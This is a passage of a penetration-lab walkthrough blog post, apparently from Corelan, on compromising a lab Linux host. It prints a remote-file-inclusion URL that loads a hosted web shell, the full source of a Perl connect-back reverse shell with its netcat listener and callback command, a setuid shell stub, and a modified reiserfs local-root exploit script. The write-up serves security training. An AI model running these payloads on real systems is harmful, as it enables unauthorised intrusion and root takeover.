Round-Trip Time: 0.25938 sec\n[+] Selected safe Round-Trip Time <span style=\"color: #0000ff;\">value<\/span> is: 0.51877 sec\n[-] fingerprint:smb need either TCP port 139 or 445 to run\n[-] fingerprint:snmp: need UDP port 161 <span style=\"color: #0000ff;\">open<\/span>\n[+] Primary guess:\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.10<\/span>\" (Guess probability: 86%)\n[+] Other guesses:\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.21<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.12<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.19<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.14<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.17<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.16<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.15<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.18<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.13<\/span>\" (Guess probability: 86%)\n[+] Cleaning up scan engine\n[+] Modules deinitialized\n[+] Execution completed.<\/pre>\n<p>Taking this into account, this can only mean that the asp files are either just static pages, or just renamed php files, served via a custom handler.<\/p>\n<p>Looking at the other folders and files I discovered in the bruteforce, my attention was drawn by a file called \/1\/index.asp<\/p>\n<p>While requests to other pages seem to redirect to images or 
just return 200 OK, this page appeared to have some content.<\/p>\n<p>Look back at the login form on the first page... It seems to be just a static html page, renamed to an asp page, without any real code behind it. No matter what you enter as username\/password, you always end up on the page again. So that either means that there's code behind it that doesn't show anything, or that there is no code behind it. No way to really tell at this point.<\/p>\n<p>But in the case of the \/1\/index.asp page, things are different.<\/p>\n<p>If you enter a username and press the Enter button, something actually returns, so it looks like there is some code behind this page :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image19.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb19.png\" alt=\"image\" width=\"462\" height=\"159\" border=\"0\" \/><\/a><\/p>\n<p>Looking at the field names in the html source of the page, I see this :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">html<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">head<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">title<\/span><span style=\"color: #0000ff;\">&gt;<\/span>Page title<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">title<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">head<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span 
style=\"color: #800000;\">body<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">div<\/span> <span style=\"color: #ff0000;\">align<\/span>=<span style=\"color: #0000ff;\">\"center\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>Wrong username or password.<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">div<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #008000;\">&lt;!--  This is the login form  --&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">form<\/span> <span style=\"color: #ff0000;\">method<\/span>=<span style=\"color: #0000ff;\">\"post\"<\/span> <span style=\"color: #ff0000;\">action<\/span>=<span style=\"color: #0000ff;\">\"\/1\/index.asp\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\nUsername: <span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"text\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_username\"<\/span> <span style=\"color: #ff0000;\">value<\/span>=<span style=\"color: #0000ff;\">\"corelanc0d3r\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">br<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\nPassword: <span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"password\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_password\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">br<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: 
#0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"submit\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_send\"<\/span> <span style=\"color: #ff0000;\">value<\/span>=<span style=\"color: #0000ff;\">\"Enter\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">form<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">body<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">html<\/span><span style=\"color: #0000ff;\">&gt;<\/span><\/pre>\n<p>A quick Google search for the field names (slogin_username or just slogin_ in general) in this asp script provided me with a few resources :<\/p>\n<p><a title=\"http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851\" href=\"http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851\">http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851<\/a><\/p>\n<p>=&gt; and that page leads me to :<\/p>\n<p><a href=\"http:\/\/www.mariovaldez.net\/software\/sitefilo\/install.php\">http:\/\/www.mariovaldez.net\/software\/sitefilo\/install.php<\/a> (Simple Text-File Login script)<\/p>\n<p>which in turn brings me to : <a title=\"http:\/\/www.milw0rm.com\/exploits\/7444\" href=\"http:\/\/www.milw0rm.com\/exploits\/7444\">http:\/\/www.milw0rm.com\/exploits\/7444<\/a><\/p>\n<p>In fact, http:\/\/192.168.6.66\/1\/version.txt confirms that this might be the code that is installed on the system :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image20.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" 
src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb20.png\" alt=\"image\" width=\"282\" height=\"262\" border=\"0\" \/><\/a><\/p>\n<p>Based on the milw0rm entry, it looks like this code may be vulnerable to a RFI (Remote File Inclusion \/ Sensitive Data Disclosure bug)<\/p>\n<p>Let's try the Data Disclosure bug first.\u00a0\u00a0 The advisory states that the default username\/password file is called slog_users.txt.<\/p>\n<p>Unfortunately this file does not contain what we had expected :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image21.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb21.png\" alt=\"image\" width=\"380\" height=\"144\" border=\"0\" \/><\/a><\/p>\n<p>(maybe they renamed the file and changed the filename in slogin_lib.inc.php). We can try to bruteforce these files, but let's save some time and try to find out if we can use the RFI bug. An RFI bug can lead to a lot of things, including injecting code and run it on the webserver (if we can for example inject it into a file that is used in a vulnerable \"include\" statement).<\/p>\n<p>A request to http:\/\/192.168.6.66\/1\/slogin_lib.inc.php resulted in a 200 OK reply, so the file seems to be there.<\/p>\n<p>The exploit code (milw0rm) indicates that this \"Simple Text-File Login script\"\u00a0 file (slogin_lib.inc.php) can be exploited using the following request :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">[!] EXPLOIT: \/[<span style=\"color: #0000ff;\">path<\/span>]\/slogin_lib.inc.php?slogin_path=[remote_txt_shell]<\/pre>\n<blockquote><p>Current time is 3:30am. Time for bed.<\/p>\n<p>Sunday morning, 10am. Back in business, time to continue work... 
reading all about the RFI bug, trying out some requests... but nothing seems to work today.<\/p><\/blockquote>\n<p>Around 4pm, I tried this :<\/p>\n<p>http:\/\/192.168.6.66\/1\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.6.71\/&cmd=ls%20-als<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image22.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb22.png\" alt=\"image\" width=\"501\" height=\"149\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image23.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb23.png\" alt=\"image\" width=\"414\" height=\"219\" border=\"0\" \/><\/a><\/p>\n<p>Aha, that looks great. It looks like code can be injected (header.inc.php file) and it would run on the webserver. (header.inc.php is added to the request automatically, so if I host some code in a file called header.inc.php, it would get included by just pointing the parameter to the root of the webserver.)<\/p>\n<p>I already figured out I can run commands within the context of the webserver account, but perhaps things can be made a bit easier : inject a full-blown php shell.<\/p>\n<p>Plan :<\/p>\n<ul>\n<li>get a copy of a php webshell (I used c99 but there are many more)<\/li>\n<li>rename it to header.inc.php,<\/li>\n<li>host it somewhere so it can be injected into the request<\/li>\n<li>inject\/execute it<\/li>\n<\/ul>\n<p>Where can I find a webserver for this... ?\u00a0 I could try to host it on my attacker machine... 
but there is a better solution.\u00a0 There's a webserver (surgemail) available on 192.168.6.70\/71\/72.\u00a0\u00a0 I have ftp write access to that server, so I can just drop some files in the c:\\surgemail\\www folder.<\/p>\n<p>In addition to the webshell, it might be nice to have a reverse shell set up from the webserver to my box, so I can easily issue OS commands.\u00a0 One of my friends (mr_me) gave me a copy of cb_shell.pl, I simply renamed it to corelanshell.pl and uploaded it to the webserver as well \ud83d\ude42<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">#!\/usr\/bin\/perl\n#\n# Connect back shell version 0.0\n# Created by Depth\n# Full hide version\n# Use: cb_shell.pl &lt;address&gt; &lt;port&gt; &lt;fake_name&gt;\n# netcat -l -p &lt;port&gt; (localhost)\n# \n\n<span style=\"color: #0000ff;\">use<\/span> IO::Socket;\n$0 = $ARGV[2];\n<span style=\"color: #0000ff;\">my<\/span> $sock = new IO::Socket::INET (PeerAddr =&gt; $ARGV[0],PeerPort =&gt; $ARGV[1],Proto =&gt; 'tcp');\n<span style=\"color: #0000ff;\">connect<\/span>(CLIENT,$sockaddr); \n\n<span style=\"color: #0000ff;\">print<\/span> $sock \"<span style=\"color: #8b0000;\">:: Depth :: Connect Back Shell ::\\n<\/span>\";\n<span style=\"color: #0000ff;\">if<\/span>(<span style=\"color: #0000ff;\">fork<\/span>() == 0){\n STDIN-&gt;fdopen($sock,w);\n STDOUT-&gt;fdopen($sock,w);\n STDERR-&gt;fdopen($sock,w);\n <span style=\"color: #0000ff;\">system<\/span>(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\");\n <span style=\"color: #0000ff;\">close<\/span>($sock);\n <span style=\"color: #0000ff;\">exit<\/span>;\n}<\/pre>\n<p>Upload script in action (saves me some time when machines get reverted \ud83d\ude42 )<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp -inv 192.168.6.70 &lt; ftpcmd       
\nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\n331 Password required for devil\n230 User devil logged in.\nRemote <span style=\"color: #0000ff;\">system<\/span> type is UNIX.\nUsing binary mode to transfer files.\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail\/www<\/span>\".\n200 Type set to I\n<span style=\"color: #0000ff;\">local<\/span>: corelanshell.pl remote: corelanshell.pl\n200 PORT command successful.\n150 Opening BINARY mode data connection for corelanshell.pl\n226 Transfer complete.\n519 bytes sent in 0.00 secs (2077.2 kB\/s)\n<span style=\"color: #0000ff;\">local<\/span>: header.inc.php remote: header.inc.php\n200 PORT command successful.\n150 Opening BINARY mode data connection for header.inc.php\n226 Transfer complete.\n150397 bytes sent in 0.94 secs (156.4 kB\/s)\n221 Goodbye.<\/pre>\n<p>Ok, so far so good. Next, I will<\/p>\n<p>1. get the header.inc.php to execute and give me a nice web shell gui<\/p>\n<p>2. use the gui to download the corelanshell.pl file<\/p>\n<p>3. 
execute the perl script and get myself a reverse shell<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Step 1 :<\/strong><\/p>\n<p>http:\/\/192.168.6.66\/1\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.6.70\/<\/p>\n<p>=&gt; This will basically grab the php shell from 192.168.6.70 (in the webroot, header.inc.php) and execute it<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image99.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image99_thumb.png\" alt=\"image\" width=\"380\" height=\"353\" border=\"0\" \/><\/a><\/p>\n<p>Using the \"find all writeable dirs and files\" option, I gathered a list of writeable folders :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">  2693    4 -rw-rw-rw-   1 root     root          163 May  4 15:52 \/var\/run\/motd\n   840    0 lrwxrwxrwx   1 root     root            5 May  4 02:26 \/var\/tmp -&gt; \/tmp\/\n  2696    0 drwxrwxrwt   4 root     root           80 May  4 15:52 \/var\/lock\n 35652    0 lrwxrwxrwx   1 root     root           18 Apr 29 21:25 \/var\/lib\/python-support -&gt; \/usr\/lib\/pymodules\n  5339    0 lrwxrwxrwx   1 root     root            7 Apr 29 21:18 \/var\/spool\/mail -&gt; ..\/mail\n 49222    4 drw-rw-rw-   2 root     root         4096 May  4 06:55 \/opt\/data\n    15    0 lrwxrwxrwx   1 root     root            7 Apr 29 21:18 \/media\/floppy -&gt; floppy0\n    13    0 lrwxrwxrwx   1 root     root            6 Apr 29 21:18 \/media\/cdrom -&gt; cdrom0\n 16655    0 lrwxrwxrwx   1 root     root           37 Apr 29 21:19 \/initrd.img -&gt; boot\/initrd.img-2.6.31-14-generic-pae\n 36865    1 drwxrwxrwt   2 root     root         1024 May  4 05:43 \/tmp\/.X11-unix\n 24577    1 drwxrwxrwt   2 root     root         1024 May  4 05:43 \/tmp\/.ICE-unix\n4026531841 
   0 lrwxrwxrwx   1 root     root            8 May  4 16:01 \/proc\/net -&gt; self\/net\n4026531840    0 lrwxrwxrwx   1 root     root           11 May  4 16:01 \/proc\/mounts -&gt; self\/mounts<\/pre>\n<p>\/var\/lock might be a good target to place my files.<\/p>\n<p><strong>Step 2 :<\/strong><\/p>\n<p>Went to the \/var\/lock folder and downloaded the corelanshell.pl file from the webserver at 192.168.6.70 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image25.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb25.png\" alt=\"image\" width=\"309\" height=\"356\" border=\"0\" \/><\/a><\/p>\n<p>=&gt;<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image26.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb26.png\" alt=\"image\" width=\"363\" height=\"133\" border=\"0\" \/><\/a><\/p>\n<p><strong>Step 3 :<\/strong><\/p>\n<p>First, set up a netcat listener on my \"attacker\" machine :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">nc -lvp 4455<\/pre>\n<p>Next, ran the following command on the server :<\/p>\n<p>perl \/var\/lock\/corelanshell.pl 192.168.6.114 4455 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image27.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb27.png\" alt=\"image\" width=\"297\" height=\"416\" border=\"0\" \/><\/a><\/p>\n<p>Result :<\/p>\n<pre style=\"background-color: #e2e2e2; 
min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lvp 4455             \nlistening on [any] 4455 ...\n<span style=\"color: #0000ff;\">connect<\/span> to [192.168.6.114] from (UNKNOWN) [192.168.6.66] 56073\n:: Depth :: Connect Back Shell ::<\/pre>\n<p>Ok, I've got a nice reverse shell.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lp 4455\n:: Depth :: Connect Back Shell ::\npwd\n\/var\/<span style=\"color: #0000ff;\">lock<\/span>\nls -al\ntotal 8\ndrwxrwxrwt  4 root     root      100 May  4 15:58 .\ndrwxr-xr-x 14 root     root     4096 May  4 02:26 ..\ndrwxr-xr-x  2 www-data root       40 May  4 15:52 apache2\n-rw-r--r--  1 www-data www-data  519 May  6  2010 corelanshell.pl\ndrwx------  2 root     root       40 May  4 15:52 lvm<\/pre>\n<p>Unfortunately I'm not running as root, so if the secret file is hidden somewhere\/protected, then I need to find a way to get more privs.<\/p>\n<p>Just to be sure, I did a quick search for all txt files, but couldn't find anything useful.<\/p>\n<p>Perhaps a local root exploit might work. The system seems to be running :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Linux ghost 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU\/Linux<\/pre>\n<p>I tried about a dozen local root exploits... but they all failed miserably... and I lost a huge amount of time... (and I have to admit that I'm not that strong in Linux exploitation. 
)<\/p>\n<p>But I never give up.<\/p>\n<p>I looked at \/etc\/fstab :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cat \/etc\/fstab\n# \/etc\/fstab: static file <span style=\"color: #0000ff;\">system<\/span> information.\n#\n# Use 'blkid -o <span style=\"color: #0000ff;\">value<\/span> -s UUID' to <span style=\"color: #0000ff;\">print<\/span> the universally unique identifier\n# for a device; this may be used with UUID= as a more robust way to name\n# devices that works even <span style=\"color: #0000ff;\">if<\/span> disks are added and removed. See fstab(5).\n#\n# &lt;file <span style=\"color: #0000ff;\">system<\/span>&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;<span style=\"color: #0000ff;\">dump<\/span>&gt;  &lt;pass&gt;\nproc            \/proc           proc    defaults        0       0\n\/dev\/mapper\/ghost-root \/               ext4    errors=remount-ro 0       1\n# \/boot was on \/dev\/sda5 during installation\nUUID=f9f46813-a78a-42e8-a007-53308212ee26 \/boot           ext2    defaults        0       2\n\/dev\/sdb1 \/apachelogs          reiserfs    user,noauto,rw,<span style=\"color: #0000ff;\">exec<\/span>,suid,user_xattr        0       2\n\/dev\/sdc1 \/tmp         ext2        noexec,nosuid,rw                    0       0\n\/dev\/mapper\/ghost-swap_1 none            swap    sw              0       0\n\/dev\/scd0       \/media\/cdrom0   udf,iso9660 user,noauto,<span style=\"color: #0000ff;\">exec<\/span>,utf8 0       0\n\/dev\/fd0        \/media\/floppy0  auto    rw,user,noauto,<span style=\"color: #0000ff;\">exec<\/span>,utf8 0       0<\/pre>\n<p>=&gt; \/apachelogs has reiserfs... 
and that's suspicious.<\/p>\n<p>So I searched for a local sploit that takes advantage of a bug in reiserfs, and I found this one :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image34.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb34.png\" alt=\"image\" width=\"282\" height=\"82\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image35.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb35.png\" alt=\"image\" width=\"283\" height=\"56\" border=\"0\" \/><\/a><\/p>\n<p><a title=\"http:\/\/www.exploit-db.com\/exploits\/12130\" href=\"http:\/\/www.exploit-db.com\/exploits\/12130\">http:\/\/www.exploit-db.com\/exploits\/12130<\/a><\/p>\n<p>After having poked around on the server, I noticed that tools such as gcc, cc etc were missing, and that paths to common binaries were not defined.\u00a0 On top of that, the default exploit code is based on the fact that the root filesystem is reiserfs, which is not the case here.<\/p>\n<p>I figured I would end up having to mod the python code (preferably on the machine itself), and that would be problematic with my perl connect-back shell (vim issues etc). 
So I decided to make my life somewhat easier and decided to use rrs to get a better shell (compiled, renamed it to corelanshell, uploaded it to 192.168.6.70, downloaded it into \/apachelogs\/data and ran it)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image31.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb31.png\" alt=\"image\" width=\"649\" height=\"171\" border=\"0\" \/><\/a><\/p>\n<p>By that time, another revert wiped out my files again, and I figured to just mod the files offline and use the perl connect back script. It should work just fine.<\/p>\n<p>&nbsp;<\/p>\n<p>Anyways, this is what was needed to root the box and see if the proof file can be found in one of the \"root-protected\" folders:<\/p>\n<ol>\n<li>compile the payload separately (because there is no cc\/gcc on the ghost machine)<\/li>\n<li>edit the python script and change all paths to absolute references.\u00a0 The plan is to put the files on \/apachelogs\/data (just a folder to keep files together) and run the script\/pre-compiled code from there<\/li>\n<li>upload the files (precompiled exploit + python script) and put the script in a location that is not mounted with noexec<\/li>\n<li>make the necessary reiserfs folder on the filesystem<\/li>\n<li>execute the script &amp; sploit<\/li>\n<li>search proof file and cat the contents<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<p><strong>Step 1<\/strong> : compiling the payload (offline, I just used my backtrack system to compile \ud83d\ude42<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# cat corelanc0d3r.c\nint main(void) { setgid(0); setuid(0); execl(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\", \"<span style=\"color: #8b0000;\">sh<\/span>\", 
0); }\nroot@krypt2:\/vpn\/70# cc -w corelanc0d3r.c -o corelanc0d3r<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 2<\/strong> : Modify the original python script<\/p>\n<ul>\n<li>leave out the components that would deal with the compilation and check if the compilation was successful<\/li>\n<li>make absolute file\/path references<\/li>\n<li>point the xattrs into \/apachelogs (instead of \/)<\/li>\n<\/ul>\n<p>(sud0 and the others from Corelan Team fixed most of the issues I had with the script - and they finally rooted the machine before I could... so big kudos to them)<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">import<\/span> <span style=\"color: #0000ff;\">os<\/span>, <span style=\"color: #0000ff;\">sys<\/span>\n#SHELL = 'int main(void) { setgid(0); setuid(0); execl(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\", \"<span style=\"color: #8b0000;\">sh<\/span>\", 0); }'\nXATTR = '\\x41\\x58\\x46\\x52\\xc1\\x00\\x00\\x02\\x01\\x00\\x00\\x02\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n \n<span style=\"color: #0000ff;\">def<\/span> err(txt):\n    <span style=\"color: #0000ff;\">print<\/span> '[-] error: %s' % txt\n    <span style=\"color: #0000ff;\">sys<\/span>.<span style=\"color: #0000ff;\">exit<\/span>(1)\n \n<span style=\"color: #0000ff;\">def<\/span> msg(txt):\n    <span style=\"color: #0000ff;\">print<\/span> '[+] %s' % txt\n \n<span style=\"color: #0000ff;\">def<\/span> main():\n    msg('checking for reiserfs mount with user_xattr mount option')\n    f = <span style=\"color: #0000ff;\">open<\/span>('\/etc\/fstab')\n    for line in f:\n        <span style=\"color: #0000ff;\">if<\/span> 'reiserfs' in line and 'user_xattr' in line:\n            break\n    <span style=\"color: #0000ff;\">else<\/span>:\n        err('failed to <span style=\"color: #0000ff;\">find<\/span> a reiserfs mount with user_xattr')\n   
 f.<span style=\"color: #0000ff;\">close<\/span>()\n \n    msg('checking for private xattrs directory at \/apachelogs\/.reiserfs_priv\/xattrs')\n \n    <span style=\"color: #0000ff;\">if<\/span> not <span style=\"color: #0000ff;\">os<\/span>.<span style=\"color: #0000ff;\">path<\/span>.exists('\/apachelogs\/.reiserfs_priv\/xattrs'):\n        err('failed to locate private xattrs directory')\n  \n    msg('capturing pre-shell snapshot of private xattrs directory')\n    pre = set(<span style=\"color: #0000ff;\">os<\/span>.listdir('\/apachelogs\/.reiserfs_priv\/xattrs'))\n     \n    msg('setting dummy xattr to get reiserfs object id')\n \n    ret=<span style=\"color: #0000ff;\">os<\/span>.system('setfattr -n \"<span style=\"color: #8b0000;\">user.hax<\/span>\" -v \"<span style=\"color: #8b0000;\">hax<\/span>\" \/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r')\n    <span style=\"color: #0000ff;\">if<\/span> ret != 0:\n        err('error setting xattr, you need setfattr')\n \n    msg('capturing post-shell snapshot of private xattrs directory')\n    post = set(<span style=\"color: #0000ff;\">os<\/span>.listdir('\/apachelogs\/.reiserfs_priv\/xattrs'))\n    objs = post.difference(pre)\n \n    msg('found %s <span style=\"color: #0000ff;\">new<\/span> object ids' % len(objs))\n    for obj in objs:\n        msg('setting cap_setuid\/cap_setgid capabilities on object id %s' % obj)\n        f = <span style=\"color: #0000ff;\">open<\/span>('\/apachelogs\/.reiserfs_priv\/xattrs\/%s\/security.capability' % obj, 'w')\n        f.<span style=\"color: #0000ff;\">write<\/span>(XATTR)\n        f.<span style=\"color: #0000ff;\">close<\/span>()\n \n    msg('spawning setuid shell...')\n    <span style=\"color: #0000ff;\">os<\/span>.system('\/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r')\n \n<span style=\"color: #0000ff;\">if<\/span> __name__ == '<span style=\"color: #0000ff;\">__main__<\/span>':\n    
